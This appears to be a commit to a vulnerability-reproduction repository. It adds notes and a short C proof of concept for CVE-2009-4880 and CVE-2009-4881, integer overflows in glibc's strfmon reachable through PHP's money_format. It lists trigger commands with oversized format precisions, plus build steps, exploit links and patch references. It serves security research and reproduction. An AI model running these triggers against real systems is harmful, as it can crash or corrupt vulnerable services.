add info for CVE-2009-4880/4881

mudongliang · May 31, 2018 · c15d0e2 · c15d0e2
1 parent 2716377
commit c15d0e2
Show file tree

Hide file tree

Showing 4 changed files with 63 additions and 3 deletions.
diff --git a/CVE-2009-4880/README.md b/CVE-2009-4880/README.md
@@ -2,14 +2,45 @@
 
 ## Experiment Environment
 
+CentOS 5.5
+
 ## INSTALL & Configuration
 
+Preinstalled environment and install php
+
+```
+tar -xvf php-5.2.9.tar.gz
+cd php-5.2.9
+./configure
+make
+```
+
 ## Problems in Installation & Configuration
 
+
 ## How to trigger vulnerability
 
+```
+./sapi/cli/php -r 'money_format("%.1073741821i",1);'
+./sapi/cli/php -r 'money_format("%.1343741821i",1);'
+```
+
 ## PoCs
 
+[ GNU glibc 'strfmon()' Function Integer Overflow Weakness](https://bugs.gentoo.org/285818)
+
+[GNU glibc 'strfmon()' Function Integer Overflow Weakness](https://www.securityfocus.com/bid/36443/exploit)
+
+[GNU glibc 2.x - 'strfmon()' Integer Overflow](https://www.exploit-db.com/exploits/33230/)
+
 ## Vulnerability Patch
 
+### Root Cause
+
+### Stack Trace
+
+### Patch
+
+See details in <https://sourceware.org/git/?p=glibc.git;a=commit;h=199eb0de8d673fb23aa127721054b4f1803d61f3>
+
 ## References
diff --git a/CVE-2009-4881/README.md b/CVE-2009-4881/README.md
@@ -1,19 +1,37 @@
-# CVE/EDB ID
+# CVE-2009-4881
 
 ## Experiment Environment
 
+CentOS 5.5
+
 ## INSTALL & Configuration
 
+Preinstalled environment
+
 ## Problems in Installation & Configuration
 
+
 ## How to trigger vulnerability
 
+```
+gcc -o pln poc.c
+./pln %99999999999999999999n
+```
+
 ## PoCs
 
+[CVE-2009-4881 glibc (32-bit): Integer overflow in the __vstrfmon_l function](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2009-4881)
+
+[libc (strfmon) Multiple vulnerabilities](http://cxsecurity.com/issue/WLB-2008030063)
+
 ## Vulnerability Details & Patch
 
 ### Root Cause
 
 ### Stack Trace
 
+### Patch
+
+<https://sourceware.org/git/?p=glibc.git;a=blobdiff;f=stdlib/strfmon_l.c;h=8e63d459e3a15ad6777be1d613216f92f398d64e;hp=c9f3a47b41d27a6c393ffbda86328c8ca569e623;hb=153aa31b93be22e01b236375fb02a9f9b9a0195f;hpb=59a7162b17f55cb292844e37ceb9c3b0a1994080>
+
 ## References
diff --git a/CVE-2009-4881/poc.c b/CVE-2009-4881/poc.c
@@ -0,0 +1,11 @@
+#include <stdio.h>
+#include <monetary.h>
+
+int main(int argc, char* argv[]){
+	char buff[51];
+	char *bux=buff;
+	int res;
+
+	res=strfmon(bux, 50, argv[1], "0");
+	return 0;
+}
diff --git a/README.md b/README.md
@@ -141,8 +141,8 @@ If you encounter problems with keyword "Failed to lock files", you could try to
 - [ ] CVE-2009-3050
 - [ ] CVE-2009-3586
 - [ ] CVE-2009-4134
-- [ ] CVE-2009-4880
-- [ ] CVE-2009-4881
+- [x] CVE-2009-4880
+- [x] CVE-2009-4881
 - [x] CVE-2009-5018
 - [x] CVE-2010-1147
 - [x] CVE-2010-1159